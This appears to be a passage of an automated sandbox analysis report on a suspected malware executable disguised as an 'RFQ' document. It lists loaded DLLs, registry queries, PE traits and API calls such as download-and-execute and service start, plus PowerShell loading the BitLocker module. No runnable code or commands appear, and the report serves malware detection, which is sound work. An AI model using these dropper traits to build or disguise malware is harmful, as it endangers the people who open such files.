                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: RFQ-20241230.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: RFQ-20241230.pif.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,5_2_0041BCF3
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00434006 push ecx; ret 5_2_00434019
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_004567F0 push eax; ret 5_2_0045680E
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0045B9DD push esi; ret 5_2_0045B9E6
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00463EF3 push ds; retf 5_2_00463EEC
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00455EBF push ecx; ret 5_2_00455ED2
                Source: RFQ-20241230.pif.exeStatic PE information: section name: .text entropy: 7.855220500565996
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00406128 ShellExecuteW,URLDownloadToFileW,5_2_00406128
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_00419BD4

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeCode function: 5_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,5_2_0041BCF3
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ-20241230.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
